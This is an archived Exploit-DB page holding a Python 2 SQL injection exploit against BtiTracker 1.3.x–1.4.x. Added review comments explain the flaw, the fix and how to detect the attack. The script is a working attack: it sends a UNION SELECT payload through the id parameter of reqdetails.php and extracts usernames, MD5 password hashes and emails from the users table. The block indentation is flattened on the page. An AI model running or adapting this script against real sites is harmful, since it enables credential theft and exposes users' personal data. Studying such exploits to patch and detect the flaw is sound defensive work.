BtiTracker 1.3.x < 1.4.x - SQL Injection

  • 作者: TinKode
    日期: 2010-06-09
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/13807/
  • #!/usr/bin/env python
    # 
    ################################################################################
    # ____________[ xpl0it ] #
    #/\___\/\_`\ __/\ \__#
    #\/_/\ \/ ___\ \,\L\_\ _____ _____ __ /\_\ \ ,_\____ #
    # \ \ \ /' _ `\/_\__ \ /'__`\ /'___\/\ \/\ \/\`'__\/\ \ \ \/ /\ \/\ \#
    #\_\ \__/\ \/\ \/\ \L\ \/\__//\ \__/\ \ \_\ \ \ \/ \ \ \ \ \_\ \ \_\ \ #
    #/\_____\ \_\ \_\ `\____\ \____\ \____\\ \____/\ \_\\ \_\ \__\\/`____ \#
    #\/_____/\/_/\/_/\/_____/\/____/\/____/ \/___/\/_/ \/_/\/__/ `/___/> \ #
    # _________________ /\___/ #
    # www.insecurity.ro \/__/#
    ## 
    ################################################################################ 
    #[ BtiTracker 1.3.X - 1.4.X Exploit ]# 
    #Greetz: daemien, Sirgod, Puscas_Marin, AndrewBoy, Ras, HrN, vilches #
    #Greetz: excess, E.M.I.N.E.M, flo flow, paxnWo, begood, and ISR Staff# 
    ################################################################################ 
    # Because we care, we're security aware# 
    ################################################################################ 
    
    import sys, urllib2, re
     
    # NOTE(review): Python 2 only (print statements, urllib2). The page has
    # flattened the block indentation; the statements are kept exactly as
    # they appear in the listing and only comments are added.
    #
    # Defender's summary: the script issues one GET to reqdetails.php with a
    # UNION SELECT carried in the `id` query parameter and parses one row of
    # the `users` table (username, password, email) out of the returned HTML.
    # The payload shape implies that reqdetails.php places `id` into a
    # numeric SQL context without validation; this is inferred from the
    # request, as the application source is not on this page. The durable
    # fix is server-side: cast `id` to an integer or bind it as a query
    # parameter.

    # Usage guard: with no target URL on the command line, print the banner
    # and stop.
    if len(sys.argv) < 2:
    print "==============================================================="
    print "============== BtiTracker 1.3.X - 1.4.X Exploit ==============="
    print "==============================================================="
    print "= Discovered and coded by TinKode ="
    print "= www.InSecurity.ro ="
    print "= ="
    print "= Local Command:="
    print "= ./isr.py [http://webshit] [ID]="
    print "= ="
    print "==============================================================="
    exit()
     
    # Row selector for the users table: defaults to 1; otherwise argv[2] is
    # used verbatim (it is not checked to be numeric). The name `id` shadows
    # the Python builtin of the same name.
    if len(sys.argv) < 3:
    id = 1
    else:
    id = sys.argv[2]
     
    # Base URL of the target, normalised to end with a slash so the script
    # name can be appended directly.
    shit = sys.argv[1]
    if shit[-1:] != "/":
    shit += "/"
     
    # Request URL. `and 1=0` empties the legitimate result set so that only
    # the UNION row is rendered; the fourth of ten columns carries
    # concat('--', username, ':', password, ':', email, '--')
    # (0x2d is '-', 0x3a is ':'). The delimiters are hex literals, so the
    # payload contains no quote characters: quote-escaping alone would not
    # stop it, whereas integer casting or parameter binding does.
    # Detection: the payload travels in the query string and is therefore
    # recorded by ordinary access logs. Any request to reqdetails.php whose
    # `id` value is not a plain integer (here it contains `union`, `select`,
    # `concat(` and `from+users`) is the indicator to search for.
    url = shit + "reqdetails.php?id=-1337+and+1=0+union+all+select+1,2,3,\
    concat(0x2d,0x2d,username,0x3a,password,0x3a,email,0x2d,0x2d)\
    ,5,6,7,8,9,10+from+users+where+ID=" + str(id) + "--"
    print "\n"
    print "============================================="
    print "================= InSecurity ================"
    print "============================================="
     
    # Plain GET with no custom headers, timeout or error handling: urllib2
    # sends its default User-Agent (Python-urllib/<version>), and an HTTP or
    # network error propagates as an uncaught exception.
    html = urllib2.urlopen(url).read()
    # Look for the `--username:password:email--` marker in the response. The
    # `(.*)` groups are greedy and `.` does not cross newlines, so the marker
    # must sit on a single line of the HTML. The password group must be
    # exactly 32 hex characters, which is the length of an MD5 digest.
    # Presumably users.password stores unsalted MD5; confirm against the
    # schema. If so, exposed hashes should be treated as compromised
    # credentials and storage moved to a salted, slow password hash.
    slobod = re.findall(r"--(.*)\:([0-9a-fA-F]{32})\:(.*)--", html)
    # Only the first match is reported.
    if len(slobod) > 0:
    print "ID : " + str(id)
    print "Username : " + slobod[0][0]
    print "Password : " + slobod[0][1]
    print "EMail: " + slobod[0][2] 
    print "============================================="
    print "================= InSecurity ================"
    print "============================================="
    else:
    # No marker in the response; the message below is Romanian slang
    # signalling failure.
    print "Ai luat-o la gaoaza..."
    
    #InSecurity.ro - Romania